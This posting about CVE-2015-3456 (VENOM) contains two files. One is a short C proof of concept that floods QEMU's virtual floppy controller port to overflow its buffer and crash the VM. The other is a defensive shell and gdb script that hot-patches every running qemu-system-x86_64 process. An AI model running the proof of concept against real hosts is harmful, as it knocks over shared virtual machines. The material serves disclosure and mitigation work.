CVE-2015-3456 "exploit"

cve-2015-3456.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/io.h>

/**
 * "Exploit" for CVE-2015-3456. This will only crash the VM. Compile with:
 *   gcc -Wall -std=c99 cve-2015-3456.c -o cve-2015-3456
 */

#define FDC_IOPORT 0x3f5
#define FD_CMD_READ_ID 0x0a

int main() {
    char progress[] = { '|', '\\', '-', '/' };
    if (ioperm(FDC_IOPORT, 1, 1) == -1) {
        fprintf(stderr, "[!] Unable to set port access permissions: %m\n");
        exit(EXIT_FAILURE);
    }

    outb(FD_CMD_READ_ID, FDC_IOPORT);
    fprintf(stdout, "[.] Overflow...");
    for (size_t i = 0;; i++) {
        if (i%10000 == 0)
            fprintf(stdout, "\r[%c]", progress[(i/10000)%sizeof(progress)]);
        fflush(stdout);
        outb(0xa, FDC_IOPORT);
    }
    fprintf(stdout, "\n");
    return 0;
}

patch-running-qemu-cve-2015-3456.sh

#!/bin/sh

# Will patch all running qemu for CVE-2015-3456. No detection of
# vulnerable processes, all processes are patched. This is harmless
# for already patched processes as long as you don't need the FDC.

# Look for the command_to_handler symbol. Need the debug symbols.

(
    cat <<EOF""
set height 0
set width 0
set verbose off

define patch
 if sizeof(command_to_handler) != 256
  printf "Size of command_to_handler is not 256 (%d)\n", sizeof(command_to_handler)
 else if command_to_handler[0] != 0x1f then
  printf "Frist byte of command_to_handler is not 0x1f (%x)\n", command_to_handler[0]
 else
  set $i = 1
  while ($i < 256)
   set variable command_to_handler[$i++] = command_to_handler[0]
  end
  printf "Done!\n"
 end
end
document patch
Fix CVE-2015-3456.
end
EOF
    for pid in $(pidof qemu-system-x86_64); do
        cat <<EOF
attach $pid
printf "Handling PID %d\n", $pid
patch
detach
EOF
    done
) > CVE-2015-3456.gdb
gdb --batch --command=CVE-2015-3456.gdb $(which qemu-system-x86_64)